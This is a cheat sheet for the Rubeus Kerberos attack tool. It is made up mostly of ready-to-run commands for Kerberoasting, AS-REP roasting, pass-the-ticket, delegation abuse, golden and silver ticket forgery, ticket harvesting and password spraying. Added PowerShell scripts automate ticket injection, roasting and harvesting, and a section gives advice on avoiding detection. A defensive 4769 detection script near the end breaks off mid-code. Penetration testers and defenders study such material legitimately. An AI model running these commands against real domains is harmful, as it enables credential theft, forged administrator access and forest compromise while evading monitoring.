
Rubeus Kerberos Interaction Tool Cheat Sheet

Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It's designed for attacking Kerberos implementations and includes functionality for ticket requests, renewals, and various Kerberos-based attacks. Rubeus is particularly useful for Active Directory penetration testing and red team operations.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

Pre-compiled Binary

GhostPack does not publish compiled releases of Rubeus; its README tells you to build it yourself, so the GitHub "releases/download" URLs that circulate for it do not resolve. If you must use a pre-built binary, take it from a source you trust (for example the NetFramework_* folders of https://github.com/Flangvik/SharpCollection, which carries nightly builds of Rubeus), and record its hash so it can be matched against a build you compile from the same commit.

# Record the hash of whatever binary you end up running
Get-FileHash Rubeus.exe -Algorithm SHA256

Compile from Source

# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"

# Output will be in Rubeus/bin/Release/

Alternative Download Methods

# Using PowerShell (substitute the URL of a build you trust; GhostPack/Rubeus has no release assets)
$url = "<URL of a trusted Rubeus.exe build>"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output

# Using curl (if available)
curl -L -o Rubeus.exe "<URL of a trusted Rubeus.exe build>"

Basic Usage

Command Structure

# Basic syntax
Rubeus.exe [command] [options]

# Get help
Rubeus.exe help

# Get help for specific command
Rubeus.exe [command] /help

Available Commands

Command          Description
asktgt           Request a TGT (Ticket Granting Ticket) with a password, NTLM hash, AES key or certificate
asktgs           Request a TGS (service ticket) using a supplied TGT
renew            Renew a TGT (repeatedly with /autorenew)
brute            Password brute forcing / spraying via AS-REQ
s4u              S4U2Self / S4U2Proxy (constrained delegation) abuse
golden           Forge a golden ticket (TGT) with the krbtgt key
silver           Forge a silver ticket (service ticket) with a service account key
ptt              Pass-the-ticket: import a ticket into a logon session
purge            Purge tickets from the current (or a given) logon session
describe         Describe ticket contents
klist            List current tickets
dump             Dump tickets from memory (elevation needed for other sessions)
triage           Triage tickets across all logon sessions
monitor          Monitor for new logon sessions and dump their TGTs
harvest          Harvest TGTs on an interval and keep them renewed
tgtdeleg         Extract a usable TGT for the current user without elevation (Kekeo tgtdeleg trick)
createnetonly    Create a sacrificial LOGON_NETCREDENTIALS_ONLY process to inject tickets into
hash             Compute RC4/AES keys from a password
kerberoast       Kerberoasting
asreproast       AS-REP roasting

Ticket Requests and Management

Request TGT (Ticket Granting Ticket)

# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com

# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com

# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com

Request TGS (Ticket Granting Service)

# Request TGS for a specific service (a TGT must be supplied; asktgs does not read the current logon session)
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com

# Request TGS as the current user: first extract a usable copy of your own TGT with tgtdeleg, then feed it in
Rubeus.exe tgtdeleg
Rubeus.exe asktgs /ticket:base64tgt /service:cifs/server.domain.com

# Request TGS for multiple services in one run
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com,http/server.domain.com

# Request TGS with a specific encryption type (rc4, aes128, aes256)
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com /enctype:aes256

Ticket Management

# List current tickets
Rubeus.exe klist

# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket

# Purge all tickets
Rubeus.exe purge

# Purge specific ticket
Rubeus.exe purge /luid:0x12345

# Dump tickets from memory (unprivileged: your own session only; elevated: all sessions)
Rubeus.exe dump

# Dump tickets for a specific user (/nowrap keeps each base64 ticket on one line)
Rubeus.exe dump /user:username /nowrap

Kerberoasting Attacks

Basic Kerberoasting

# Kerberoast every SPN-bearing user account found via LDAP (output defaults to hashcat format)
Rubeus.exe kerberoast /nowrap

# Kerberoast a specific account
Rubeus.exe kerberoast /user:serviceaccount /nowrap

# Only roast accounts without AES enabled, requesting RC4 through the tgtdeleg trick (avoids an explicit RC4 downgrade on AES-capable accounts)
Rubeus.exe kerberoast /rc4opsec

# Only roast accounts that support AES (far slower to crack, but no RC4 service ticket requests in the logs)
Rubeus.exe kerberoast /aes

# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt

Advanced Kerberoasting

# Kerberoast with an extra LDAP filter (ANDed with Rubeus' own servicePrincipalName filter)
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"

# Kerberoast a trusted domain
Rubeus.exe kerberoast /domain:target.domain.com

# Kerberoast through a specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com

# Request the ticket with an enterprise principal name for a given SPN (useful across trusts)
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.target.domain.com:1433 /enterprise

Targeted Kerberoasting

# Kerberoast a specific SPN
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433

# Kerberoast a list of SPNs from a file (one SPN per line)
Rubeus.exe kerberoast /spns:spns.txt

# Limit to accounts whose password was set before / after a date (MM-DD-YYYY); old passwords are the ones worth cracking
Rubeus.exe kerberoast /pwdsetbefore:01-01-2020
Rubeus.exe kerberoast /pwdsetafter:01-01-2020

# Kerberoast high-value targets (accounts protected by AdminSDHolder)
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"

AS-REP Roasting Attacks

Basic AS-REP Roasting

# AS-REP roast all users
Rubeus.exe asreproast

# AS-REP roast specific user
Rubeus.exe asreproast /user:username

# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat

Advanced AS-REP Roasting

# AS-REP roast with an LDAP filter (4194304 is the DONT_REQ_PREAUTH bit of userAccountControl, which is what Rubeus already selects on)
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# AS-REP roast a trusted domain
Rubeus.exe asreproast /domain:target.domain.com

# AS-REP roast through a specific domain controller
Rubeus.exe asreproast /dc:dc01.domain.com

# Use explicit credentials for the LDAP enumeration (domain\user form), e.g. from a host that is not domain-joined
Rubeus.exe asreproast /creduser:domain.com\username /credpassword:password /domain:domain.com /dc:dc01.domain.com

# Roast one known user: no LDAP lookup at all, only an AS-REQ, so it works unauthenticated from any host that reaches the KDC
Rubeus.exe asreproast /user:username /domain:domain.com /dc:dc01.domain.com /format:hashcat /nowrap
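
Before handing the Kerberoast and AS-REP roast output above to a cracker it pays to split it by encryption type: hashcat takes one mode per run, and the RC4 (etype 23) hashes crack far faster than AES, so they should go first. The PowerShell below is an added example, not code from the Rubeus project or the original cheat sheet. It assumes the hashes were produced with /format:hashcat, one per line (/outfile or /nowrap output); the three hashes at the bottom are constructed placeholders with dummy hex bodies, and the hashcat mode numbers are the ones hashcat documents for TGS-REP etype 23/17/18 and AS-REP etype 23.

```powershell
# Added example: triage Rubeus roasting output into one file per hashcat mode.

function ConvertFrom-RubeusRoastHash {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Line)
    begin {
        # hashcat modes: TGS-REP etype 23/17/18, AS-REP etype 23
        # (AS-REP etype 17/18 needs a newer hashcat mode and is left unmapped here)
        $tgsModes   = @{ 23 = 13100; 17 = 19600; 18 = 19700 }
        $asrepModes = @{ 23 = 18200 }
    }
    process {
        $Line = $Line.Trim()
        if (-not $Line) { return }

        # TGS-REP, RC4 layout : $krb5tgs$23$*user$DOMAIN$spn*$checksum$edata
        # TGS-REP, AES layout : $krb5tgs$18$user$DOMAIN$*spn*$checksum$edata
        if ($Line -match '^\$krb5tgs\$(?<etype>\d+)\$\*?(?<user>[^$]+)\$(?<domain>[^$]+)\$\*?(?<spn>[^*]+)\*\$') {
            $etype = [int]$Matches.etype
            return [pscustomobject]@{
                Kind = 'TGS-REP'; User = $Matches.user; Domain = $Matches.domain; Spn = $Matches.spn
                EType = $etype; HashcatMode = $tgsModes[$etype]; Hash = $Line
            }
        }
        # AS-REP, hashcat layout: $krb5asrep$23$user@DOMAIN:checksum$edata
        if ($Line -match '^\$krb5asrep\$(?<etype>\d+)\$(?<user>[^@]+)@(?<domain>[^:]+):') {
            $etype = [int]$Matches.etype
            return [pscustomobject]@{
                Kind = 'AS-REP'; User = $Matches.user; Domain = $Matches.domain; Spn = $null
                EType = $etype; HashcatMode = $asrepModes[$etype]; Hash = $Line
            }
        }
        Write-Warning "Unrecognised line (john format or truncated?): $($Line.Substring(0, [Math]::Min(40, $Line.Length)))"
    }
}

function Split-RoastHashesByMode {
    # Writes hashes_<mode>.txt for each hashcat mode and returns one summary row per mode
    param([Parameter(Mandatory)][string]$Path, [string]$OutDir = '.')
    $parsed = Get-Content -Path $Path | ConvertFrom-RubeusRoastHash | Where-Object HashcatMode
    foreach ($g in ($parsed | Group-Object HashcatMode | Sort-Object { [int]$_.Name })) {
        $file = Join-Path $OutDir "hashes_$($g.Name).txt"
        $g.Group.Hash | Set-Content -Path $file
        [pscustomobject]@{
            HashcatMode = [int]$g.Name
            Count       = $g.Count
            Accounts    = (($g.Group.User | Sort-Object -Unique) -join ',')
            File        = $file
        }
    }
}

# Constructed sample input (real hashes carry hundreds of hex characters)
$sample = @'
$krb5tgs$23$*sqlsvc$DOMAIN.COM$MSSQLSvc/sql01.domain.com:1433*$1f2e3d4c5b6a79880f1e2d3c4b5a6978$aabbccdd
$krb5tgs$18$websvc$DOMAIN.COM$*HTTP/web01.domain.com*$112233445566778899aabbcc$ddeeff
$krb5asrep$23$jdoe@DOMAIN.COM:00112233445566778899aabbccddeeff$a1b2c3
'@
$sample | Set-Content -Path .\roast_sample.txt
Split-RoastHashesByMode -Path .\roast_sample.txt | Format-Table -AutoSize
# Crack cheapest first, e.g.:  hashcat -m 13100 hashes_13100.txt wordlist.txt
```

The summary row per mode also tells you which accounts ended up AES-only; if those are the interesting ones, a /rc4opsec run will not help and the budget is better spent on a targeted wordlist than on brute force.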

Pass-the-Ticket (PTT) Attacks

Basic Pass-the-Ticket

# Pass-the-ticket with a base64 ticket (imports into the current logon session)
Rubeus.exe ptt /ticket:base64ticket

# Pass-the-ticket from a .kirbi file
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass-the-ticket into a specific logon session (requires elevation)
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345

# Create a sacrificial netonly logon session first, then inject into it; your own session's tickets stay untouched
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
Rubeus.exe ptt /ticket:base64ticket /luid:0x<LUID printed by createnetonly>

# Request a TGT and drop it straight into a new sacrificial process in one step
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Advanced PTT Techniques

# Pass several tickets: run ptt once per ticket, they accumulate in the target session
Rubeus.exe ptt /ticket:ticket1.kirbi
Rubeus.exe ptt /ticket:ticket2.kirbi

# Check what a ticket is for (service, realm, flags, lifetime) before injecting it
Rubeus.exe describe /ticket:base64ticket

# Tickets are injected per logon session (LUID), not per process: every process running under that LUID, the user's explorer.exe included, sees the ticket
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345
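
The createnetonly-then-ptt sequence above is the one most operators end up scripting, because the LUID has to be read off Rubeus' output and fed back in. The PowerShell below is an added example, not code from the Rubeus project or the original cheat sheet: Get-RubeusLuid parses the "[+] LUID : 0x..." line createnetonly prints, and Invoke-PttIntoNewSession chains the two commands. The Rubeus path, the sample output lines and the "Ticket successfully imported" success string are assumptions about current Rubeus output; adjust them if your build prints something different.

```powershell
# Added example: createnetonly -> ptt into the new session, with the LUID parsed from Rubeus output.

function Get-RubeusLuid {
    param([Parameter(Mandatory)][string[]]$RubeusOutput)
    foreach ($line in $RubeusOutput) {
        if ($line -match 'LUID\s*:\s*(?<luid>0x[0-9a-fA-F]+)') { return $Matches.luid }
    }
    throw 'No LUID found in Rubeus output'
}

function Invoke-PttIntoNewSession {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Ticket,                 # base64 kirbi or path to a .kirbi file
        [string]$Program    = 'C:\Windows\System32\cmd.exe',
        [string]$RubeusPath = '.\Rubeus.exe',                  # assumed location of the binary
        [switch]$Show                                          # show the new window instead of hiding it
    )
    # ptt /luid into a session other than your own needs an elevated context
    $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
               ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    if (-not $isAdmin) { throw 'ptt /luid requires elevation; run from a high-integrity context' }

    $createArgs = @('createnetonly', "/program:$Program")
    if ($Show) { $createArgs += '/show' }
    $created = & $RubeusPath @createArgs
    $luid = Get-RubeusLuid -RubeusOutput $created

    $pttOut = & $RubeusPath ptt "/ticket:$Ticket" "/luid:$luid"
    if (-not ($pttOut -match 'Ticket successfully imported')) {
        throw "ptt into $luid failed:`n$($pttOut -join "`n")"
    }
    [pscustomobject]@{ Luid = $luid; Program = $Program; Imported = $true }
}

# Constructed sample of createnetonly output, to exercise the parser without the binary
$sampleOutput = @(
    '[*] Action: Create Process (/netonly)',
    '[*] Showing process : True',
    '[*] Username        : 4QRR6Z3G',
    '[*] Domain          : RV8A1GFG',
    '[*] Password        : 0ZTBE7V5',
    '[+] Process         : ''C:\Windows\System32\cmd.exe'' successfully created with LOGON_TYPE = 9',
    '[+] ProcessID       : 4120',
    '[+] LUID            : 0x3e7f2a'
)
Get-RubeusLuid -RubeusOutput $sampleOutput

# Real use (needs Rubeus.exe and an elevated shell):
# Invoke-PttIntoNewSession -Ticket 'base64ticket' -Show
```

The netonly process authenticates locally as you but uses the injected ticket for everything over the network, which is why the random username/password createnetonly prints are irrelevant; what matters is the LUID. Kill the sacrificial process when done, that removes its logon session and the tickets in it.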

S4U (Service for User) Attacks

S4U2Self and S4U2Proxy (full chain)

# s4u runs S4U2Self (a ticket to the service account itself for the impersonated user) and then S4U2Proxy to the SPN in /msdsspn
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# Same chain, authenticating with the service account's AES256 key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# Same chain, starting from an existing TGT of the service account
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

S4U2Proxy with Alternate Service Classes

# Swap the service class of the final ticket: the host part of the SPN is validated by the KDC, the service class is not
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

# Request several alternate service classes at once
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap

# With an existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

Constrained Delegation Abuse

# Abuse constrained delegation against a DC; the SPN must be in the account's msDS-AllowedToDelegateTo
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com

# With protocol transition (TrustedToAuthForDelegation set), inject the result directly as an ldap ticket (enables DCSync against the DC)
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt

# /altservice only changes the service class; it cannot point the ticket at a host that is not in msDS-AllowedToDelegateTo
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:http,host

Golden and Silver Ticket Attacks

Golden Ticket Creation

# Create golden ticket (krbtgt RC4 key); /sid is the domain SID, /sids adds extra SIDs such as parent-domain Enterprise Admins (RID 519)
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

# Create golden ticket with the krbtgt AES256 key (preferred: an RC4-encrypted TGT for an AES-capable domain stands out)
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...

# Create golden ticket with specific group RIDs (512 Domain Admins, 513 Domain Users, 518 Schema Admins, 519 Enterprise Admins, 520 Group Policy Creator Owners)
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520

# Let Rubeus pull the SID, group RIDs and other PAC fields for the user from LDAP instead of typing them
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /ldap /ptt

Silver Ticket Creation

# Create silver ticket (service account RC4 key, i.e. its NTLM hash); /sid is still required so the PAC carries the domain SID
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com /sid:S-1-5-21-...

# Create silver ticket with the service account's AES256 key
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com /sid:S-1-5-21-...

# Create silver ticket for a specific service (never touches the DC: only the service host sees it, so no 4769 is logged)
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com /sid:S-1-5-21-...

Ticket Harvesting and Monitoring

Ticket Harvesting

# Harvest TGTs from every logon session every 30 seconds and keep them renewed (loops until stopped; needs elevation)
Rubeus.exe harvest /interval:30

# Bound the run (seconds) and keep each base64 ticket on one line
Rubeus.exe harvest /interval:30 /runfor:3600 /nowrap

# Save the output to a file (harvest prints to stdout; redirect it)
Rubeus.exe harvest /interval:30 /runfor:3600 /nowrap > harvested_tickets.txt

Ticket Monitoring

# Monitor for new logon sessions and dump their TGTs (needs elevation)
Rubeus.exe monitor

# Monitor with a specific polling interval (seconds)
Rubeus.exe monitor /interval:60

# Only report tickets for one account (typical target: a DC machine account when abusing unconstrained delegation)
Rubeus.exe monitor /targetuser:administrator /nowrap

# Save the output to a file
Rubeus.exe monitor /interval:60 /nowrap > monitored_tickets.txt

Ticket Triage

# Triage all tickets (elevation needed to see sessions other than your own)
Rubeus.exe triage

# Triage tickets for a specific user
Rubeus.exe triage /user:administrator

# Triage a specific logon session
Rubeus.exe triage /luid:0x12345

# Show only tickets for a given service (krbtgt = TGTs)
Rubeus.exe triage /service:krbtgt

Password Attacks

Password Spraying

# Check the lockout policy before spraying
net accounts /domain

# Spray a single password; without /users Rubeus enumerates users over LDAP and tries every one of them
Rubeus.exe brute /password:Password123 /noticket

# Try a password list (each failure is one 4771 pre-authentication failure on the DC and counts against the lockout threshold)
Rubeus.exe brute /passwords:passwords.txt /noticket

# Spray a specific list of users (preferred: scope and lockout risk stay under control)
Rubeus.exe brute /users:users.txt /password:Password123 /noticket

# Spray against a specific domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket

Credential Validation

# A successful asktgt ("TGT request successful!") is the validation; no extra flag is needed
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /nowrap

# Validate an NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /nowrap

# Validate an AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /nowrap

# /getcredentials is for certificate (PKINIT) logons: it recovers the account's NTLM hash from the PAC via a U2U request
Rubeus.exe asktgt /user:username /certificate:cert.pfx /password:pfxpassword /domain:domain.com /getcredentials

Advanced Techniques

Cross-Domain Attacks

# Request a TGT in the child domain
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com /nowrap

# Request the inter-realm (referral) TGT for the parent domain with the child TGT
Rubeus.exe asktgs /ticket:base64ticket /service:krbtgt/parent.domain.com /dc:dc01.child.domain.com /nowrap

# Golden ticket in the child domain (child krbtgt hash) with the parent's Enterprise Admins SID (-519) in SID history; SID filtering is not applied on intra-forest trusts, so this is forest compromise
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

Unconstrained Delegation Abuse

# On a host with unconstrained delegation, watch for the DC machine account's TGT arriving (e.g. after coercing the DC to authenticate)
Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap

# Or pull the cached TGTs out of LSA directly
Rubeus.exe dump /service:krbtgt /nowrap

# Use the extracted TGT (DCSync is possible with a DC machine account TGT)
Rubeus.exe ptt /ticket:extractedtgt

Resource-Based Constrained Delegation

# Abuse RBCD: the controlled account must be listed in the target's msDS-AllowedToActOnBehalfOfOtherIdentity; /altservice yields tickets for several service classes from one S4U2Proxy
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt

# RBCD with a computer account you own; /rc4 is the computer account's NTLM hash (derive it from a known password with "Rubeus.exe hash /password:pass /user:COMPUTER$ /domain:domain.com")
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt

Evasion Techniques

OPSEC Considerations

# Prefer AES where the accounts support it; RC4 (etype 0x17) service ticket requests from a user account are the classic Kerberoasting signature
Rubeus.exe kerberoast /aes

# Spread requests out (/delay in milliseconds, /jitter in percent)
Rubeus.exe kerberoast /delay:5000 /jitter:30

# Pin requests to one (less monitored) domain controller
Rubeus.exe kerberoast /dc:dc02.domain.com

# Request only the SPNs you actually need instead of roasting everything
Rubeus.exe kerberoast /spn:specific/service.domain.com

Stealth Operations

# Keep a requested TGT out of any LSA cache: print it instead of /ptt and use it later from a sacrificial netonly session
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /nowrap

# When abusing delegation, swap the service class rather than requesting a second ticket
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

# Check a ticket's lifetime and flags before using it; forged tickets whose lifetime does not match the domain policy (10-hour TGT by default) stand out
Rubeus.exe describe /ticket:base64ticket

Integration with Other Tools

Mimikatz Integration

# Rubeus prints tickets as base64-encoded .kirbi; write one to disk for Mimikatz (PowerShell)
Rubeus.exe dump /service:krbtgt /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("base64ticket"))

# Inject in Mimikatz
mimikatz # kerberos::ptt ticket.kirbi

Impacket Integration

# Convert the .kirbi to a ccache with Impacket's ticketConverter.py, then point KRB5CCNAME at it
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass domain.com/administrator@target.domain.com

Cobalt Strike Integration

# Run Rubeus in memory from a beacon; /nowrap keeps base64 tickets on one line in the console
beacon> execute-assembly C:\Tools\Rubeus.exe kerberoast /nowrap
beacon> execute-assembly C:\Tools\Rubeus.exe asreproast /nowrap
beacon> execute-assembly C:\Tools\Rubeus.exe dump /nowrap

Automation Scripts

Comprehensive Kerberos Assessment

# Comprehensive Kerberos assessment script
param(
    [string]$Domain = $env:USERDOMAIN,
    [string]$OutputPath = "C:\Temp\KerberosAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"

# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath"

Automated Ticket Harvesting

# Automated ticket harvesting script
param(
    [int]$Interval = 300,  # 5 minutes
    [string]$OutputPath = "C:\Temp\TicketHarvest",
    [int]$Duration = 3600  # 1 hour
)

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1

Write-Host "[+] Starting ticket harvesting for $Duration seconds"

while ((Get-Date) -lt $endTime) {
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $outputFile = "$OutputPath\harvest_$iteration`_$timestamp.txt"

    # "harvest" itself loops forever on its own interval and would block here; take a one-shot TGT snapshot per iteration instead
    Write-Host "[+] Iteration $iteration - Dumping TGTs..."
    & Rubeus.exe dump /service:krbtgt /nowrap | Out-File $outputFile

    Write-Host "[+] Tickets saved to $outputFile"

    if ((Get-Date) -lt $endTime) {
        Write-Host "[+] Waiting $Interval seconds..."
        Start-Sleep -Seconds $Interval
    }

    $iteration++
}

Write-Host "[+] Ticket harvesting complete"

Domain Reconnaissance Script

# Domain reconnaissance with Rubeus
param(
    [string]$Domain,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = "C:\Temp\DomainRecon"
)

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting domain reconnaissance for $Domain"

# Test credentials
Write-Host "[+] Testing credentials..."
# a successful asktgt is the credential check; note the output file will contain the base64 TGT
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /nowrap
$credTest | Out-File "$OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") {
    Write-Host "[+] Credentials valid, continuing reconnaissance..."

    # Rubeus expects /creduser in domain\user form
    $credUser = "$Domain\$Username"

    # Kerberoasting with credentials
    Write-Host "[+] Kerberoasting with credentials..."
    & Rubeus.exe kerberoast /creduser:$credUser /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"

    # AS-REP Roasting with credentials
    Write-Host "[+] AS-REP Roasting with credentials..."
    & Rubeus.exe asreproast /creduser:$credUser /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"

    Write-Host "[+] Reconnaissance complete"
} else {
    Write-Host "[-] Credentials invalid, stopping reconnaissance"
}

Troubleshooting

Common Issues

# Clock skew (Kerberos tolerates 5 minutes by default)
w32tm /query /status
w32tm /resync

# Network connectivity to the KDC (port 88)
nslookup domain.com
Test-NetConnection dc01.domain.com -Port 88

# Reset the local ticket cache and confirm it is empty
klist purge
klist

# Locate KDCs through the SRV record
nslookup -type=SRV _kerberos._tcp.domain.com

Debug Mode

# Enable verbose Kerberos client logging; client-side errors then show up in the System log (source "Kerberos")
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1 /f

# TGT (4768) and TGS (4769) request events are written to the Security log of the domain controller, not the client
Get-WinEvent -ComputerName dc01.domain.com -FilterHashtable @{LogName='Security'; Id=4768,4769} -MaxEvents 50

# Check the local ticket cache
klist tickets

Error Resolution

# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout

# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain

# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format

# KRB_AP_ERR_SKEW
# Synchronize time with domain controller

Best Practices

Operational Security

  1. Blend in: work from accounts and hosts that already talk to the targeted services; one user requesting tickets for dozens of SPNs is the Kerberoasting signature
  2. Limit requests: don't flood the domain controller; scope with /spn, /user or /resultlimit and pace with /delay and /jitter
  3. Time synchronization: keep clock skew under the 5-minute Kerberos default or every request fails with KRB_AP_ERR_SKEW
  4. Clean up: purge injected tickets (Rubeus.exe purge) and kill sacrificial netonly processes when done
  5. Monitor logs: know which events you generate (4768 TGT requests, 4769 TGS requests, 4771 pre-authentication failures, 4624 logon type 9 for createnetonly)
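
Point 5 is easier to respect once you have seen the detection side of the 4769 events a kerberoast run leaves on the DC. The PowerShell below is an added example, not code from the Rubeus project or the original cheat sheet: ConvertFrom-Event4769 pulls the relevant fields out of a 4769 record as returned by (Get-WinEvent ...).ToXml() on a domain controller, and Find-KerberoastBurst flags accounts that requested service tickets for many distinct service accounts within a short window, RC4 (0x17) only by default because that is what a default kerberoast run asks for. The records at the bottom are constructed, not captured, and the thresholds are starting points, not tuned values.

```powershell
# Added example: the blue-team view of Kerberoasting, over 4769 (TGS request) events.

function ConvertFrom-Event4769 {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$EventXml)
    process {
        $x = [xml]$EventXml
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.GetAttribute('Name')] = $n.InnerText }
        [pscustomobject]@{
            Time    = [datetime]$x.Event.System.TimeCreated.SystemTime
            User    = ($d['TargetUserName'] -split '@')[0]   # 4769 carries user@REALM
            Service = $d['ServiceName']                       # the account that owns the SPN, not the SPN itself
            EType   = [int]$d['TicketEncryptionType']         # "0x17" -> 23
            Ip      = $d['IpAddress']
        }
    }
}

function Find-KerberoastBurst {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinDistinctServices = 5,
        [int]$WindowMinutes = 10,
        [switch]$AnyEType        # also catch "kerberoast /aes" style runs, at the cost of more noise
    )
    # Tickets to krbtgt or to machine accounts, and requests made by machine accounts, are normal traffic
    $candidates = $Events | Where-Object {
        ($AnyEType -or $_.EType -eq 0x17) -and
        $_.Service -ne 'krbtgt' -and $_.Service -notlike '*$' -and $_.User -notlike '*$'
    }
    foreach ($g in ($candidates | Group-Object User)) {
        $sorted = @($g.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start  = $sorted[$i].Time
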